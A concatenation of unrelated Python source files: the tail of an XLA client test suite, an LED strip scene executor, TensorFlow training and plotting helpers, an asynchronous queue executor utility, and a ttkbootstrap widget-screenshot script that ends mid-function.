c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def DISABLED_testMapWithStaticOperands(self):
c = self._NewComputation()
factor = c.ConstantF32Scalar(3.0)
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32ByParamComputation(), [0],
static_operands=[factor])
self._ExecuteAndCompareClose(c, expected=[3.0, 6.0, 9.0, 12.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.Infeed(xla_client.Shape.from_numpy(to_infeed[0]))
compiled_c = c.Build().CompileWithExampleArguments()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = compiled_c.Execute()
self.assertEqual(result, item)
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x = c.Infeed(xla_client.Shape.from_numpy(to_round_trip[0]))
c.Outfeed(x)
compiled_c = c.Build().CompileWithExampleArguments()
for want in to_round_trip:
execution = threading.Thread(target=compiled_c.Execute)
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.Shape.from_numpy(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
class ErrorTest(LocalComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument shape.*xla_client_test.py.*"
r"expected s32\[\], got f32\[\]",
lambda: c.Build().CompileWithExampleArguments([self.f32_scalar_2]))
if __name__ == "__main__":
unittest.main()
|
scene_executor.py
|
import threading
import time
from ws2812.scenes.WhiteLoading import WhiteLoading
class SceneExecutor:
def __init__(self):
self.thread_running = False
self.thread = None
self.led_count = None
self.frame_time = 0.5
self.step_size = 1
self.scene = WhiteLoading()
self.neopixel = None
def thread_func(self):
step = 0
while self.thread_running:
time_started = time.perf_counter()
colors = self.scene.do(step, self.led_count)
for idx, color in enumerate(colors):
self.neopixel[idx] = color
while time.perf_counter() - time_started < self.frame_time:
time.sleep(0.05)
self.neopixel.show()
step += self.step_size
def start(self, neopixel, led_count):
self.neopixel = neopixel
self.led_count = led_count
self.thread = threading.Thread(target=self.thread_func)
self.thread_running = True
self.thread.start()
def stop(self):
self.thread_running = False
def wait_for_stop(self):
self.thread.join()
self.thread = None
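# Example usage (a minimal sketch; `strip` stands in for any NeoPixel-style object
# supporting item assignment and a show() method -- nothing in this file defines one):
# executor = SceneExecutor()
# executor.start(neopixel=strip, led_count=30)
# time.sleep(10)
# executor.stop()
# executor.wait_for_stop()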
|
common.py
|
import cv2
import tensorflow as tf
import matplotlib.pyplot as plt
from PIL import Image
import numpy as np
import os
import glob
from tensorflow.python.keras import backend as K
import threading
import time
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.metrics import plot_confusion_matrix
from utils.confusion_matrix_pretty_print import plot_confusion_matrix_from_data
from screeninfo import get_monitors
def set_mixed_precision(policy_name='mixed_float16'):
    # Compare (major, minor) as integers; parsing the '.'-joined parts as a float turns
    # "2.10" into 2.1 and would route newer TF releases to the experimental API.
    major, minor = (int(v) for v in tf.__version__.split('.')[:2])
    if (major, minor) >= (2, 4):
        tf.keras.mixed_precision.set_global_policy(policy_name)
    else:
        policy = tf.keras.mixed_precision.experimental.Policy(policy_name)
        tf.keras.mixed_precision.experimental.set_policy(policy)
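# Example (sketch): enable the policy once, before any layers are constructed, so
# that subsequently built Keras layers compute in float16 with float32 variables.
# set_mixed_precision('mixed_float16')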
def move_plot_window_to_center(plt):
    fig = plt.gcf()
    size = fig.get_size_inches() * fig.dpi  # size in pixels
    mngr = plt.get_current_fig_manager()
    try:
        # Qt-style backends expect integer pixel coordinates.
        monitor = get_monitors()[0]
        mngr.window.setGeometry(int(monitor.width // 2 - size[0] // 2),
                                int(monitor.height // 2 - size[1] // 2),
                                int(size[0]), int(size[1]))
    except Exception:
        # Backends without a Qt-style setGeometry (e.g. TkAgg) are left where they are.
        pass
def clean_checkpoints_fn(checkpoints_dir):
max_keep_num = 5
while True:
checkpoints_list = glob.glob(os.path.join(checkpoints_dir, "*.index"))
if len(checkpoints_list) > max_keep_num:
sorted_by_mtime_ascending = sorted(checkpoints_list, key=lambda t: os.stat(t).st_mtime)
for i in range(len(checkpoints_list) - max_keep_num):
try:
    os.remove(sorted_by_mtime_ascending[i])
    os.remove(".".join(sorted_by_mtime_ascending[i].split('.')[:-1]) + ".data-00000-of-00001")
except OSError:
    # The checkpoint or its companion data file may already be gone; keep cleaning.
    pass
time.sleep(5)
def clean_checkpoints(checkpoints_dir):
x = threading.Thread(target=clean_checkpoints_fn, args=(checkpoints_dir,))
x.start()
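# Hedged usage note (not part of the original file): clean_checkpoints() starts a
# non-daemon background thread that prunes all but the newest five checkpoints
# every 5 seconds, so the process stays alive until it is killed, e.g.
#   clean_checkpoints("./checkpoints")
#   model.fit(...)   # checkpoints written to ./checkpoints are pruned as training runs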
def show_classes_hist(class_sizes,class_names):
plt.rcdefaults()
x_pos = np.arange(len(class_names))
plt.bar(x=x_pos,height=class_sizes,width=0.4,align="center")
# plt.ylabel(u'count')
plt.xlabel(u'class name')
plt.xticks(x_pos,class_names)
# plt.legend((rect,),(u"xxx",))
move_plot_window_to_center(plt)
man = plt.get_current_fig_manager()
man.canvas.set_window_title("classes histogram")
plt.show()
def get_best_model_path(dir):
files = glob.glob(os.path.join(dir,"best_weight*"))
sorted_by_mtime_descending = sorted(files, key=lambda t: -os.stat(t).st_mtime)
if len(sorted_by_mtime_descending)==0:
return None
return '.'.join(sorted_by_mtime_descending[0].split('.')[0:-1])
def freeze_model(model, frozen=True):
model.trainable = not frozen
if isinstance(model, tf.keras.Model):
for l in model.layers:
freeze_model(l, frozen)
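# Hedged usage note (not part of the original file): freeze_model recurses into
# nested tf.keras.Model instances, so freezing a pretrained backbone freezes every
# sub-layer as well, e.g.
#   freeze_model(backbone, frozen=True)    # backbone.trainable -> False, recursively
#   freeze_model(backbone, frozen=False)   # unfreeze again for fine-tuning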
def plot_figures(figures, nrows = 1, ncols=1,window_title="training samples"):
"""Plot a dictionary of figures.
Parameters
----------
figures : <title, figure> dictionary
ncols : number of columns of subplots wanted in the display
nrows : number of rows of subplots wanted in the figure
"""
fig, axeslist = plt.subplots(ncols=ncols, nrows=nrows,dpi=180)
for ind,title in enumerate(figures):
axeslist.ravel()[ind].imshow(figures[title], cmap=plt.gray())
axeslist.ravel()[ind].set_title(title)
axeslist.ravel()[ind].set_axis_off()
plt.tight_layout() # optional
move_plot_window_to_center(plt)
man = plt.get_current_fig_manager()
man.canvas.set_window_title(window_title)
plt.show()
def show_training_images(generator,num_img=9):
prefix="img_"
figures={}
img_index=0
for index,(image,label) in enumerate(generator):
title=prefix+str(index)+":"+generator.class_names[np.argmax(label[0])]
figures[title]=image[0].astype(np.uint8)
img_index+=1
if img_index>=num_img:
break
# plot of the images
num_row=len(list(figures.keys()))//3
num_col=3
plot_figures(figures, num_row, num_col,window_title="training samples")
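# Hedged usage note (not part of the original file): show_training_images expects a
# generator that yields (image_batch, label_batch) pairs with one-hot labels and
# exposes class_names, e.g.
#   show_training_images(train_generator, num_img=9)   # train_generator is the caller's dataset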
def get_confusion_matrix(dataset,model,save_dir=None):
pred_result = model.predict(dataset,verbose=1)
pred_cls = np.argmax(pred_result,axis=-1)
pred_scores = np.max(pred_result,axis=-1)
valid_img_path_list = dataset.img_path_list[dataset.valid_mask]
valid_label_list = dataset.label_list[dataset.valid_mask]
wrong_pred_mask = valid_label_list!=pred_cls
    columns = dataset.class_names
    # Plot configuration passed to plot_confusion_matrix_from_data
    annot = True
    cmap = 'Oranges'
    fmt = '.2f'
    lw = 0.5
    cbar = False
    show_null_values = 2
    pred_val_axis = 'y'
    # Font/figure size: use a larger canvas when there are many samples
    fz = 12
    figsize = [9, 9]
    if len(valid_label_list) > 10:
        fz = 9
        figsize = [14, 14]
    cur_plt = plot_confusion_matrix_from_data(valid_label_list, pred_cls, columns,
                                              annot, cmap, fmt, fz, lw, cbar,
                                              figsize, show_null_values, pred_val_axis)
move_plot_window_to_center(plt)
man = plt.get_current_fig_manager()
man.canvas.set_window_title("confusion_matrix")
plt.show()
#
return show_multi_img(dataset,valid_img_path_list[wrong_pred_mask],valid_label_list[wrong_pred_mask],pred_cls[wrong_pred_mask],pred_scores[wrong_pred_mask],dataset.class_names)
def show_multi_img(dataset,img_path_list,label_list,pred_list,pred_scores,class_names):
prefix=""
# max_num = min(len(img_path_list),10)
# img_path_list=img_path_list[:max_num]
# label_list=label_list[:max_num]
# pred_list=pred_list[:max_num]
for index,(img_path,label,pred,score) in enumerate(zip(img_path_list,label_list,pred_list,pred_scores)):
title=prefix+"{}/{} < ".format(str(index+1),len(img_path_list))+"label:"+class_names[label]+",pred:"+class_names[pred]+",score:"+"{:.2f}".format(score)+" >"+"\n"+img_path
image = np.ascontiguousarray(Image.open(img_path).convert('RGB'))
image = dataset.valid_resize_img(image)
plt.imshow(image)
plt.title(title)
move_plot_window_to_center(plt)
man = plt.get_current_fig_manager()
man.canvas.set_window_title("wrong prediction images")
plt.show()
plt.close()
return list(zip(img_path_list,label_list,pred_list,pred_scores))
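if __name__ == "__main__":
    # Hedged demo (not part of the original module): plot a class-size histogram
    # for a small, made-up label distribution using the helper defined above.
    show_classes_hist(class_sizes=[120, 80, 45], class_names=["cat", "dog", "bird"])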
|
async_utils.py
|
# Lint as: python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities to use within loggers."""
import queue
import threading
from typing import Callable, TypeVar, Generic
from absl import logging
E = TypeVar("E")
class AsyncExecutor(Generic[E]):
"""Executes a blocking function asynchronously on a queue of items."""
def __init__(
self,
fn: Callable[[E], None],
queue_size: int = 1,
interruptible_interval_secs: float = 1.0,
):
"""Buffers elements in a queue and runs `fn` asynchronously..
NOTE: Once closed, `AsyncExecutor` will block until current `fn` finishes
but is not guaranteed to dequeue all elements currently stored in
the data queue. This is intentional so as to prevent a blocking `fn` call
from preventing `AsyncExecutor` from closing.
Args:
fn: A callable to be executed upon dequeuing an element from data
queue.
queue_size: The maximum size of the synchronized buffer queue.
      interruptible_interval_secs: Timeout interval in seconds for blocking
        queue operations, after which the background thread checks for errors
        and whether it should stop, then retries.
"""
self._data = queue.Queue(maxsize=queue_size)
self._should_stop = threading.Event()
self._errors = queue.Queue()
self._interruptible_interval_secs = interruptible_interval_secs
def _dequeue() -> None:
"""Dequeue data from a queue and invoke blocking call."""
while not self._should_stop.is_set():
try:
element = self._data.get(timeout=self._interruptible_interval_secs)
# Execute fn upon dequeuing an element from the data queue.
fn(element)
except queue.Empty:
# If queue is Empty for longer than the specified time interval,
# check again if should_stop has been requested and retry.
continue
except Exception as e:
logging.error("AsyncExecuter thread terminated with error.")
logging.exception(e)
self._errors.put(e)
self._should_stop.set()
raise # Never caught by anything, just terminates the thread.
self._thread = threading.Thread(target=_dequeue, daemon=True)
self._thread.start()
def _raise_on_error(self) -> None:
try:
# Raise the error on the caller thread if an error has been raised in the
# looper thread.
raise self._errors.get_nowait()
except queue.Empty:
pass
def close(self):
self._should_stop.set()
# Join all background threads.
self._thread.join()
# Raise errors produced by background threads.
self._raise_on_error()
def put(self, element: E) -> None:
"""Puts `element` asynchronuously onto the underlying data queue.
The write call blocks if the underlying data_queue contains `queue_size`
elements for over `self._interruptible_interval_secs` second, in which
case we check if stop has been requested or if there has been an error
raised on the looper thread. If neither happened, retry enqueue.
Args:
element: an element to be put into the underlying data queue and dequeued
asynchronuously for `fn(element)` call.
"""
while not self._should_stop.is_set():
try:
self._data.put(element, timeout=self._interruptible_interval_secs)
break
except queue.Full:
continue
else:
# If `should_stop` has been set, then raises if any has been raised on
# the background thread.
self._raise_on_error()
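# --- Hedged usage sketch (not part of the original module) -------------------
# Shows the intended pattern: enqueue entries with put() so a slow, blocking
# sink runs off the caller's thread; close() joins the worker and re-raises any
# error it hit. Items still buffered at close() time may be dropped, as the
# NOTE in __init__ explains. `slow_write` below is a made-up stand-in sink.
if __name__ == "__main__":
  import time
  def slow_write(entry) -> None:
    # Stand-in for a blocking I/O call (e.g. writing a log entry to disk).
    time.sleep(0.1)
    print("wrote", entry)
  executor = AsyncExecutor(slow_write, queue_size=4)
  for step in range(10):
    executor.put({"step": step})  # blocks only while the buffer is full
  executor.close()  # joins the background thread and surfaces its errors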
|
widget_screenshots.py
|
"""
Script for generating Widget screenshots for documentation
"""
from multiprocessing.context import Process
from tkinter import ttk
from ttkbootstrap import Style
from ttkbootstrap import widgets
from ttkbootstrap.gallery.screenshot import Screenshot
# get_screensize = lambda: print((window.winfo_width(), window.winfo_height()))
# window.after(1000, get_screensize)
def screenshot_button(screenshot_on=True, theme='flatly'):
"""
Get screenshot for solid and outline pushbuttons
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/buttons.png')
# solid buttons
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='TButton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=5)
ttk.Button(f1, text='TButton', style=f'TButton', width=20).pack(fill='x', padx=5, pady=10)
for s in style.colors:
ttk.Button(f1, text=f'{s}.TButton', style=f'{s}.TButton').pack(fill='x', padx=5, pady=10)
# outline buttons
f2 = ttk.Frame(window, padding=5)
f2.pack(fill='both', side='left', expand='yes')
ttk.Label(f2, text='Outline.TButton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f2).pack(fill='x', padx=5, pady=5)
ttk.Button(f2, text='Outline.TButton', style='Outline.TButton').pack(fill='x', padx=5, pady=10)
for s in style.colors:
ttk.Button(f2, text=f'{s}.Outline.TButton', style=f'{s}.Outline.TButton').pack(fill='x', padx=5, pady=10)
# link buttons
f3 = ttk.Frame(window, padding=5)
f3.pack(fill='both', side='left', expand='yes')
ttk.Label(f3, text='Link.TButton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f3).pack(fill='x', padx=5, pady=5)
ttk.Button(f3, text='Link.TButton', style='Link.TButton', width=20).pack(fill='x', padx=5, pady=10)
for s in style.colors:
ttk.Button(f3, text=f'{s}.Link.TButton', style=f'{s}.Link.TButton').pack(fill='x', padx=5, pady=10)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
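# Note (hedged, not part of the original script): every helper below repeats the
# same capture pattern used above — build the widgets, then
#   window.after(1000, lambda: ss.get_bounding_box(None))  # capture once rendered
#   window.after(1500, window.quit)                        # close the window
#   window.mainloop()
# giving the Tk event loop roughly a second to draw before the screenshot is taken.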
def screenshot_checkbutton(screenshot_on=True, theme='flatly'):
"""
Get screenshot for classic checkbutton style
"""
style = Style(theme)
window = style.master
window.geometry('272x280')
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/checkbutton.png')
# classic checkbutton
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='TCheckbutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=5)
for s in style.colors:
b = ttk.Checkbutton(f1, text=f'{s}.TCheckbutton', style=f'{s}.TCheckbutton')
b.pack(fill='x', padx=5, pady=10)
b.invoke()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_checkbutton_toolbutton(screenshot_on=True, theme='flatly'):
"""
Get screenshot for classic toolbutton
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/checkbutton_toolbutton.png')
f5 = ttk.Frame(window, padding=10)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text='Toolbutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=(5, 10))
def create_frame(parent, c):
"""Create frame for each item and insert widgets"""
parent.setvar(f'{c}-a', True)
parent.setvar(f'{c}-b', False)
parent.setvar(f'{c}-c', False)
ttk.Label(parent, text=f'{c}.Toolbutton').pack(padx=5, pady=(5, 0), fill='x')
frame = ttk.Frame(parent)
frame.pack()
ttk.Checkbutton(frame, variable=f'{c}-a', text='Selected', style=f'{c}.Toolbutton', padding=5, width=10).pack(
side='left', pady=(5, 10), fill='x')
ttk.Checkbutton(frame, variable=f'{c}-b', text='Check', style=f'{c}.Toolbutton', padding=5, width=10).pack(
side='left', pady=(5, 10), fill='x')
ttk.Checkbutton(frame, variable=f'{c}-c', text='Check', style=f'{c}.Toolbutton', padding=5, width=10).pack(
side='left', pady=(5, 10), fill='x')
return frame
for c in style.colors:
create_frame(f5, c).pack()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_checkbutton_outline_toolbutton(screenshot_on=True, theme='flatly'):
"""
Get screenshot for classic outline toolbutton
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/checkbutton_outline_toolbutton.png')
f5 = ttk.Frame(window, padding=10)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text='Outline.Toolbutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=(5, 10))
def create_frame(parent, c):
"""Create frame for each item and insert widgets"""
parent.setvar(f'{c}-a', True)
parent.setvar(f'{c}-b', False)
parent.setvar(f'{c}-c', False)
ttk.Label(parent, text=f'{c}.Outline.Toolbutton').pack(padx=5, pady=(5, 0), fill='x')
frame = ttk.Frame(parent)
frame.pack()
ttk.Checkbutton(frame, variable=f'{c}-a', text='Selected', style=f'{c}.Outline.Toolbutton', padding=5,
width=10).pack(
side='left', padx=0, pady=(5, 10), fill='x')
ttk.Checkbutton(frame, variable=f'{c}-b', text='Check', style=f'{c}.Outline.Toolbutton', padding=5,
width=10).pack(
side='left', padx=0, pady=(5, 10), fill='x')
ttk.Checkbutton(frame, variable=f'{c}-c', text='Check', style=f'{c}.Outline.Toolbutton', padding=5,
width=10).pack(
side='left', padx=0, pady=(5, 10), fill='x')
return frame
for c in style.colors:
create_frame(f5, c).pack()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_roundtoggle_toolbutton():
"""
Get screenshot for a round toggle toolbutton
"""
style = Style()
window = style.master
window.geometry('272x335')
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/roundtoggle.png')
# classic checkbutton
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f1, text='Roundtoggle.Toolbutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=5)
# buttons
for s in style.colors:
b = ttk.Checkbutton(f1, text=f'{s}.Roundtoggle.Toolbutton', style=f'{s}.Roundtoggle.Toolbutton')
b.pack(fill='x', padx=5, pady=10)
b.invoke()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_squaretoggle_toolbutton():
"""
Get screenshot for a round toggle toolbutton
"""
style = Style()
window = style.master
window.geometry('272x335')
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/squaretoggle.png')
# classic checkbutton
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f1, text='Squaretoggle.Toolbutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=5)
# buttons
for s in style.colors:
